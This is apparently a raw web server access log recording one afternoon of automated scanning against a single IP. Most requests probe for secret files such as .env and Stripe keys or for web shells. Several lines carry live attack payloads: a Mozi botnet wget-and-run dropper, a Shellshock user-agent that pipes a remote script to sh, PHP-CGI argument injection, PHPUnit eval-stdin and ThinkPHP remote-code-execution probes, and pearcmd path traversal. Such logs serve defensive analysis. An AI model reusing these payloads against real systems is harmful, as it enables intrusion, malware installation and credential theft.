[Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/.github/secrets/stripe.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/.gitlab/stripe.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/.gitlab-ci/stripe.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/.circleci/stripe.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/storage/stripe.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/storage/stripe.keys" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/storage/keys/stripe.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/storage/secrets/stripe.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:39:27 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 143.198.233.138] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[16/Jan/2026:14:39:27 +0000] 404 - GET http 92.249.249.197 "/.git/config" [Client 143.198.233.138] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[16/Jan/2026:14:39:54 +0000] 400 - - http localhost "-" [Client 20.64.96.205] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:14:39:55 +0000] 400 - - http localhost "-" [Client 20.64.96.205] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:14:40:19 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:15:06:26 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:15:17:55 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:15:22:57 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:15:32:13 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:15:32:24 +0000] 400 - GET http 92.249.249.197 "/" [Client 209.38.25.9] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[16/Jan/2026:15:32:25 +0000] 400 - GET http 92.249.249.197 "/t4" [Client 209.38.25.9] [Length 252] [Gzip -] "Mozilla/5.0" "-" +[16/Jan/2026:15:32:25 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 209.38.25.9] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[16/Jan/2026:15:39:44 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[16/Jan/2026:15:52:53 +0000] 404 - GET http 92.249.249.197 "/index.asp" [Client 204.76.203.20] [Length 122] [Gzip 1.35] "Hello World/1.0" "-" +[16/Jan/2026:15:55:45 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[16/Jan/2026:15:58:22 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:16:07:41 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 194.165.16.167] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:16:08:07 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:16:17:41 +0000] 404 - GET http 92.249.249.197 "/shell?cd+/tmp;rm+-rf+*;wget+http://14.205.104.200:55747/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws" [Client 14.205.104.200] [Length 150] [Gzip -] "Hello, world" "-" +[16/Jan/2026:16:18:38 +0000] 404 - GET http profibot.direct.quickconnect.to "/style.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:38 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/style.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:38 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/themes/style.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:38 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/style.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:39 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/style.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:39 +0000] 404 - GET http profibot.direct.quickconnect.to "/chosen.php?p=" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:39 +0000] 404 - GET http profibot.direct.quickconnect.to "/file.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:39 +0000] 404 - GET http profibot.direct.quickconnect.to "/flower.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:39 +0000] 404 - GET http profibot.direct.quickconnect.to "/gifclass.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:39 +0000] 404 - GET http profibot.direct.quickconnect.to "/bless.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/class-t.api.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/blurbs.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/akcc.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/abcd.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/shelp.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/cord.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/dex.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/admin-ajax.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/file2.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:41 +0000] 404 - GET http profibot.direct.quickconnect.to "//zwso.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/zwso.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/hellopress/wp_mna.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/bolt.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/shlo.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/133.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/ahax.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/php8.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/lufix1.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/witmm.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/css/index.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/index.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/index.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/ioxi-o.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/222.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/files.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-editor.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/txets.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/txets.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/txets.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/postnews.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/postnews.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:18:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/postnews.php" [Client 104.28.235.58] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:16:23:47 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:16:41:00 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.149.159] [Length 1033] [Gzip -] "-" "-" +[16/Jan/2026:16:48:16 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:16:50:07 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:16:54:56 +0000] 404 - POST http 92.249.249.197 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[16/Jan/2026:16:54:56 +0000] 200 - GET http 92.249.249.197 "/" [Client 192.159.99.95] [Length 1033] [Gzip -] "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.qre.sh||busybox wget -qO- http://41.231.37.153/rondo.qre.sh||curl -s http://41.231.37.153/rondo.qre.sh)|sh\x22& # rondo2012@atomicmail.io" "-" +[16/Jan/2026:17:00:20 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 106.54.176.158] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:17:00:36 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 106.54.176.158] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:17:00:36 +0000] 404 - POST http 92.249.249.197 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:36 +0000] 405 - POST http 92.249.249.197 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 106.54.176.158] [Length 154] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:36 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:37 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:37 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:37 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:38 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:38 +0000] 404 - GET http 92.249.249.197 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:38 +0000] 404 - GET http 92.249.249.197 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:38 +0000] 404 - GET http 92.249.249.197 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:39 +0000] 404 - GET http 92.249.249.197 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:39 +0000] 404 - GET http 92.249.249.197 "/phpunit/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:39 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:40 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:40 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:40 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:40 +0000] 404 - GET http 92.249.249.197 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:41 +0000] 404 - GET http 92.249.249.197 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:41 +0000] 404 - GET http 92.249.249.197 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:41 +0000] 404 - GET http 92.249.249.197 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:42 +0000] 404 - GET http 92.249.249.197 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:42 +0000] 404 - GET http 92.249.249.197 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:42 +0000] 404 - GET http 92.249.249.197 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:43 +0000] 404 - GET http 92.249.249.197 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:43 +0000] 404 - GET http 92.249.249.197 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:43 +0000] 404 - GET http 92.249.249.197 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:44 +0000] 404 - GET http 92.249.249.197 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:44 +0000] 404 - GET http 92.249.249.197 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:44 +0000] 404 - GET http 92.249.249.197 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:45 +0000] 404 - GET http 92.249.249.197 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:45 +0000] 404 - GET http 92.249.249.197 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:45 +0000] 404 - GET http 92.249.249.197 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:45 +0000] 404 - GET http 92.249.249.197 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:46 +0000] 404 - GET http 92.249.249.197 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:46 +0000] 404 - GET http 92.249.249.197 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:46 +0000] 404 - GET http 92.249.249.197 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:47 +0000] 404 - GET http 92.249.249.197 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:47 +0000] 404 - GET http 92.249.249.197 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:47 +0000] 404 - GET http 92.249.249.197 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:47 +0000] 404 - GET http 92.249.249.197 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:48 +0000] 404 - GET http 92.249.249.197 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:48 +0000] 403 - GET http 92.249.249.197 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:48 +0000] 403 - GET http 92.249.249.197 "/index.php?lang=../../../../../../../../tmp/index1" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:00:48 +0000] 404 - GET http 92.249.249.197 "/containers/json" [Client 106.54.176.158] [Length 150] [Gzip -] "libredtail-http" "-" +[16/Jan/2026:17:03:11 +0000] 200 - GET http 92.249.249.197 "/" [Client 109.105.210.99] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[16/Jan/2026:17:06:40 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:17:06:43 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.236.176.205] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "-" +[16/Jan/2026:17:12:18 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 178.16.53.82] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:17:13:44 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:17:15:27 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:17:39:17 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:17:40:12 +0000] 404 - GET http 92.249.249.197 "/login" [Client 193.142.146.230] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:17:46:10 +0000] 404 - GET http 92.249.249.197 "/cgi-bin/luci/;stok=/locale" [Client 193.142.147.209] [Length 150] [Gzip -] "-" "-" +[16/Jan/2026:17:47:39 +0000] 200 - GET http 92.249.249.197 "/?XDEBUG_SESSION_START=phpstorm" [Client 79.124.40.174] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[16/Jan/2026:17:57:55 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:18:03:56 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:18:17:58 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B137 Safari/601.1" "-" +[16/Jan/2026:18:17:58 +0000] 404 - GET http 92.249.249.197 "/.env.pgsql" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 